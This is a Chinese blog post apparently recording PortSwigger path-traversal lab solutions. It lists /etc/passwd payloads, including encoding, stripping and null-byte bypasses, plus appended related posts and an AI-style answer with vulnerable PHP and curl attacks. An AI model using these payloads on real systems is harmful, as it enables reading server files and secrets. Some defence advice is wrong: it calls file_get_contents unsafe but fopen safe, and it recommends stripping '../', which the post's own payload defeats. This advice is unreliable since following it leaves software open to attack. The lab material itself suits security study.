PortSwigger 路径遍历

原创 已于 2024-12-16 15:44:51 修改 · 395 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #目录遍历 #web安全

于 2024-12-16 15:43:59 首次发布

一、什么是路径遍历漏洞

        路径遍历漏洞允许攻击者通过构造特殊的输入,绕过应用程序的安全限制,访问或执行服务器上的任意文件或目录。这些文件可能包括应用程序代码和数据、后端系统的凭据以及敏感的操作系统文件等。

二、文件路径遍历,简单情况

filename=../../../etc/passwd

三、文件路径遍历,被绝对路径旁路阻塞的遍历序列

filename=/etc/passwd

四、文件路径遍历,非递归剥离的遍历序列

filename=....//....//....//etc/passwd

五、文件路径遍历,用多余的 URL 解码剥离的遍历序列

filename=..%252f..%252f..%252fetc/passwd

六、文件路径遍历,验证路径的开头

filename=/var/www/images/../../../etc/passwd

七、文件路径遍历,使用空字节绕过验证文件扩展名

filename=../../../etc/passwd%00.png

八、如何防止路径遍历攻击

  • 严格输入验证:对用户输入的文件路径进行严格的验证和过滤,确保只接受合法的文件路径。可以使用正则表达式、白名单等方式来限制用户输入
  • 使用安全的文件操作函数:避免使用不安全的文件操作函数,如fread、fwrite、file_get_contents等。这些函数直接将用户输入作为文件路径,容易引发路径遍历漏洞。应该使用更加安全的文件操作函数,如fopen、fclose、fgets等,并在打开文件之前进行充分的检查
  • 路径规范化:在构建文件路径之前,对用户输入进行规范化处理。例如,将路径分隔符替换为标准分隔符(如使用斜杠“/”而不是反斜杠“\”),并确保路径的开始点在应用程序的根目录之下
  • 设置安全的文件和目录权限:对敏感文件和目录设置最小必要的权限,只允许文件所有者或特定的用户组访问这些文件。同时,定期检查文件和目录的权限设置,确保没有不必要的权限被赋予
  • 运行在沙盒环境中:将应用程序运行在沙盒环境中,限制其对系统资源的访问权限。这样即使应用程序存在路径遍历漏洞,攻击者也无法利用该漏洞执行恶意代码或访问敏感文件
Path traversal 路径遍历
jamesP777的博客
05-20 1101
路径遍历也称为目录遍历。这些漏洞使攻击者能够读取运行应用程序的服务器上的任意文件。程序代码和数据后端系统证书敏感的操作系统文件在某些情况下,攻击者可能能够写入服务器上的任意文件,允许他们修改应用程序数据或行为,并最终完全控制服务器。
「 典型安全漏洞系列 」06.路径遍历(Path Traversal)漏洞详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-24 6549
路径遍历(Path Traversal)是一种安全漏洞,也被称为目录遍历目录穿越、文件路径遍历。它发生在应用程序未正确验证用户提供的文件路径时,允许攻击者访问系统上的敏感文件或目录,甚至执行恶意代码。
路径遍历
Vinson的博客
10-05 4378
路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为“点-点斜线”、“目录遍历”、“目录...
路径遍历攻击通俗解释
最新发布
weixin_43172311的博客
06-21 504
想象一下,你把重要文件锁在一个带密码的保险箱里(服务器文件系统),但黑客发现了一个漏洞——他可以通过操纵你给的“密码”(文件路径),偷偷打开保险箱,不仅拿走你的文件,甚至还能把里面的东西换成炸弹(恶意代码)!这就是路径遍历攻击的可怕之处
路径遍历目录遍历
世间繁华梦一出
04-21 4136
一、简介 路径遍历攻击也成为目录遍历,旨在,访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对路径来引用文件的变量,来访问存储在文件系统上的任意文件和目录,包括应用程序源代码 ...
目录/路径遍历
weixin_30485291的博客
03-24 195
基本定义: 目录遍历(或路径遍历)(directory traversal/path traversal)是由于Web服务器或Web应用程序对用户输入文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过HTTP请求和利用一些特殊字符就可以绕过服务器的安全限制,访问任意受限的文件(可以是Web目录以外的文件),甚至执行系统命令。可能导致路径遍历一些特殊字符: .. ..\ ...
路径与文件、文件遍历
mrljw的博客
04-09 560
//下面的一段代码主要是获得当前程序的运行目录(.exe)所在的目录{ CString path; GetModuleFileName(NULL,path.GetBufferSetLength(MAX_PATH+1),MAX_PATH); path.ReleaseBuffer(); int pos = path.ReverseFind('\\'); path ...
burp靶场-path traversal
qq_33168924的博客
01-15 661
修改filename值:filename=…/etc/passwd。修改GET url:/image?读取:/etc/passwd。
BurpSuit官方实验室之目录穿越
tpaer的博客
11-13 961
这是BurpSuit官方的实验室靶场,以下将记录个人目录穿越共6个Lab的通关过程。
PortSwigger——Path traversal
qq_55202378的博客
02-11 972
路径遍历也称为目录遍历,该漏洞使攻击者能够读取运行应用程序的服务器上的任意文件。在某些情况下,攻击者可能能够写入服务器上的任意文件,从而允许他们修改应用程序数据或行为,并最终完全控制服务器。
PortSwigger——web cache deception
qq_55202378的博客
02-10 911
内容交付网络(Content Delivery Networks,CDN)就是缓存技术,CDN使用缓存将内容的副本存储在世界各地的分布式服务器上,通过从最接近用户的服务器提供内容来加速交付,通过最小化数据传输距离来减少加载时间。另一些则首先根据编码的URL应用缓存规则,然后解码URL并将其转发到下一个服务器,这些行为还可能导致缓存和源服务器解释URL路径的方式不一致。请注意,这只表明资源是可缓存的。如果传入请求的缓存键与前一个请求的缓存键匹配,则该高速缓存认为它们是等价的,并提供缓存响应的副本。
广度优先搜索遍历路径
11-03
大学课程、数据结构、代码、建立图的存储结构、广度优先搜索遍历路径
深度优先算法(DFS)遍历有向无环图寻找最优路径
11-27
采用深度优先算法(DFS)遍历有向无环图寻找最优路径,经过优化的深度优先算法,在遍历有向无环图的时候保存路径,并计算路径权值,最总返回最优路径及最有路径的权值
超强的文件路径遍历软件
04-14
采用了消息处理机制,实现了文件路径的查询!
Portswigger 学院】路径遍历
shawdow_bug的博客
07-03 1282
路径遍历漏洞的原理和一些 bypass 技巧
java代码审计:路径遍历
qq_34778376的博客
03-11 3941
漏洞描述 路径遍历是指应用程序接收了未经合理校验的输入参数用于进行与文件读取、写入、查看相关操作。 攻击者可以通过输入特殊构造的文件名,来下载应用程序的执行文件或查看服务器中受保护目录下的文件、目录或者覆盖敏感数据 。 在大多数情况下,构造的文件路径的参数虽然未过滤处理,但不能由用户控制。 如果是这样,不属于路径遍历漏洞的情况。 缺陷代码: @GET @Path("/images/{image}") @Produces("images/*") public Response getImage(@javax.
WEB安全基础入门—目录遍历路径遍历\路径穿越攻击)
Eason_LYC安全白帽子的成长博客
06-06 3740
WEB安全基础入门-目录遍历路径遍历路径穿越攻击) 欢迎关注订阅专栏! WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏!......
图的路径遍历和层级遍历
上官云霆的博客
11-22 1558
图的路径遍历可以得到图的所有路径图,层级遍历可以得到这个图有多少层,方便我们系统逐级加载数据 程序的主要功能 输出路径图。首选获得所有的路径图,以list展示 按层级展示(层级之间存在重复字段)。将这些路径图按层级进行归并。由于同一个字段可能以不同层级存在于一个字段,故两个层级之间存在重复字段) 按层级展示。将第二步中的字段,从高层开始向下层开始遍历,如果存在重复字段,则删除底层的重复字段。 import lombok.Getter; import lombok.Setter; import lomb
应用安全系列之十一:路径遍历
jimmyleeee的专栏
03-05 2982
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
不用dvwa了能不能用别的办法帮我演示相对路径攻击
03-16
<think>好的,用户之前问了关于DVWA配置reCAPTCHA的问题,现在他们想了解如果不用DVWA,有没有其他方法可以演示相对路径攻击。首先,我需要确认用户的需求到底是什么。相对路径攻击通常指的是利用文件路径遍历漏洞,也就是目录遍历攻击,攻击者通过构造特定的路径来访问或操作本不应该被访问的文件或目录。比如,通过像../../这样的路径来访问系统文件。 用户可能是一位安全学习者,或者是正在准备演示的教师,他们需要替代DVWA的工具或方法来展示这种攻击。DVWA可能配置起来有问题,或者用户想尝试不同的环境,所以需要其他解决方案。接下来,我需要考虑有哪些替代方案可以演示路径遍历漏洞,同时要确保这些方法简单易行,适合教学或演示。 首先,可以推荐使用其他漏洞演练环境,比如OWASP Juice Shop,WebGoat,或者bWAPP。这些平台内置了各种漏洞,包括路径遍历,用户可以直接使用它们进行练习。另外,如果用户希望更灵活,可以自行搭建简单的PHP服务器,编写存在漏洞的代码,比如通过文件参数未经验证直接读取文件内容。例如,一个PHP脚本使用$_GET['file']来获取文件路径,如果没有过滤../,就会导致路径遍历漏洞。 另外,Docker环境可能是一个快速搭建漏洞环境的方法,比如使用vulhub中的项目,这样用户不需要复杂的配置就能启动一个漏洞实例。还有在线实验平台,如Hack The Box或TryHack Me,提供现成的环境,用户可以直接在浏览器中练习,无需本地安装。 需要详细说明每种方法的步骤,比如使用PHP搭建漏洞环境时,要具体说明代码示例,如何启动服务器,以及如何利用curl或浏览器进行攻击测试。同时,要提醒用户仅在合法授权的环境中进行测试,避免法律问题。 可能用户对某些工具不熟悉,所以需要给出具体的操作命令和访问方式。此外,要比较不同方法的优缺点,比如本地搭建可能需要更多配置,而在线平台则更方便但可能需要注册。还要注意安全性,确保用户明白在测试环境中操作,避免影响真实系统。 最后,总结各种方法,帮助用户根据自身情况选择最合适的方案。确保回答结构清晰,分点说明,便于用户逐步实施。同时,检查是否有遗漏的细节,比如是否需要安装特定软件,或者如何验证攻击是否成功。例如,在PHP示例中,攻击成功后应该能读取到/etc/passwd文件的内容,从而证明漏洞存在。 另外,用户可能对相对路径攻击的具体原理不太清楚,可能需要简要解释一下,但用户的问题更偏向于实践演示,所以重点放在方法步骤上。还要注意使用中文,避免专业术语过于晦涩,必要时进行解释。确保推荐的工具和资源是当前可用的,比如提供的GitHub链接是否有效,Docker镜像是否存在等。 总结来说,回答需要涵盖多种替代DVWA的方法,每种方法的详细步骤,注意事项,以及验证方式,同时保持结构清晰,易于理解和操作。</think>--- ### 一、相对路径攻击(路径遍历)原理 **相对路径攻击**(Path Traversal)又称目录遍历漏洞,攻击者通过构造如 `../../` 的路径访问受限文件。 **典型漏洞代码示例**(PHP): ```php $file = $_GET['file']; // 未过滤用户输入 readfile("/var/www/uploads/" . $file); ``` 若用户提交 `file=../../../../etc/passwd`,可能读取系统敏感文件。 --- ### 二、替代DVWA的演示方法 #### 方法1:使用漏洞演练平台 | 工具名称 | 特点 | 操作步骤 | |----------------|-------------------------------|--------------------------------------------------------------------------| | **OWASP Juice Shop** | 现代Web应用靶场,含路径遍历漏洞 | 1. 安装:`docker run -d -p 3000:3000 owasp/juice-shop`<br>2. 访问 `http://localhost:3000` | | **WebGoat** | OWASP官方教学靶场 | 1. 下载:https://github.com/WebGoat/WebGoat<br>2. 启动:`mvn spring-boot:run`<br>3. 访问 `http://localhost:8080/WebGoat` | | **bWAPP** | 专为漏洞演示设计 | 1. 下载:http://www.itsecgames.com/<br>2. 部署到PHP环境,访问 `http://localhost/bWAPP` | --- #### 方法2:手动搭建简易漏洞环境 **步骤1:创建存在漏洞的PHP文件** ```php <?php // vuln.php $file = $_GET['file']; include("/var/www/project/docs/" . $file); ?> ``` **步骤2:启动PHP开发服务器** ```bash php -S localhost:8000 ``` **步骤3:发起攻击测试** ```bash # 尝试读取/etc/passwd curl "http://localhost:8000/vuln.php?file=../../../../etc/passwd" ``` **预期结果**: 若返回系统用户列表,说明漏洞存在。 --- #### 方法3:使用Docker快速部署 **利用vulhub中的CVE环境**: ```bash # 下载vulhub git clone https://github.com/vulhub/vulhub.git cd vulhub/CVE-2022-XXXX # 替换为具体路径遍历漏洞编号 # 启动环境 docker-compose up -d ``` 访问 `http://localhost:8080` 进行攻击测试。 --- #### 方法4:在线实验平台 | 平台名称 | 特点 | 访问方式 | |----------------|-------------------------------|-----------------------------------| | **Hack The Box** | 提供真实漏洞环境(需注册) | https://www.hackthebox.com/ | | **TryHack Me** | 分步教学+交互式实验 | https://tryhackme.com/ | | **PortSwigger Academy** | 免费Web安全课程含路径遍历实验 | https://portswigger.net/web-security | --- ### 三、攻击演示案例(以手动环境为例) **漏洞代码**: ```php // file: vulnerable.php $user_file = $_GET['download']; header('Content-Type: application/octet-stream'); readfile("user_files/" . $user_file); ``` **攻击步骤**: 1. **正常请求**: `http://localhost/vulnerable.php?download=report.pdf` 2. **路径遍历攻击**: `http://localhost/vulnerable.php?download=../../.env` > ✅ 成功下载服务器环境变量文件(若未过滤) --- ### 四、防御方案(对比) | 攻击手段 | 漏洞原因 | 修复方法 | |-------------------|------------------------|-------------------------------------| | `../../etc/passwd` | 未过滤用户输入 | 使用 `basename()` 或 `realpath()` | | `%2e%2e%2f` | 未解码URL编码 | 先解码再验证路径 | | `....//` | 过滤逻辑不严谨 | 替换所有 `../` 为空字符串 | **安全代码示例**: ```php $file = $_GET['file']; // 防御方案1:白名单验证 $allowed_files = ['doc1.pdf', 'doc2.txt']; if (!in_array($file, $allowed_files)) { die("非法请求!"); } // 防御方案2:路径标准化 $base_dir = '/var/www/safe/'; $full_path = realpath($base_dir . $file); if (strpos($full_path, $base_dir) !== 0) { die("路径非法!"); } ``` --- ### 五、注意事项 1. **法律合规性** ➔ 仅在本地或授权环境中测试,禁止对未授权系统进行攻击。 2. **容器隔离** ➔ 使用Docker时,建议添加 `--read-only` 标志防止误操作: ```bash docker run --read-only -p 3000:3000 owasp/juice-shop ``` 3. **日志监控** ➔ 演示时开启服务器日志观察攻击过程: ```bash tail -f /var/log/apache2/access.log ``` --- 通过上述方法,无需依赖DVWA即可清晰演示相对路径攻击的原理与防御策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值